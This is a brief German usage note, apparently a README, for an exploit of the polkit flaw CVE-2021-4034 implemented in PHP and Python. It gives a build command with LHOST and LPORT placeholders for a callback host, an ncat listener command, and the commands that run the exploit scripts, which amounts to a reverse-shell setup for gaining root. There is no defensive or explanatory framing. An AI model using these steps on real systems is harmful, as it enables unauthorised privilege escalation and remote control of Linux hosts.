
Polkit CVE-2021-4034-Ausnutzung in einer Hochsprache
Polkit-CVE-2021-4034-Ausnutzung in einer höheren Programmiersprache
make LHOST=ip.or.domain.tld LPORT=8000
TCP-Port-Listener öffnen, Beispiel mit ncat auf Loopback
ncat -vl 127.0.0.1 8000
Exploit ausführen
php ${ARCH}_exploit.php
python ${ARCH}_exploit.py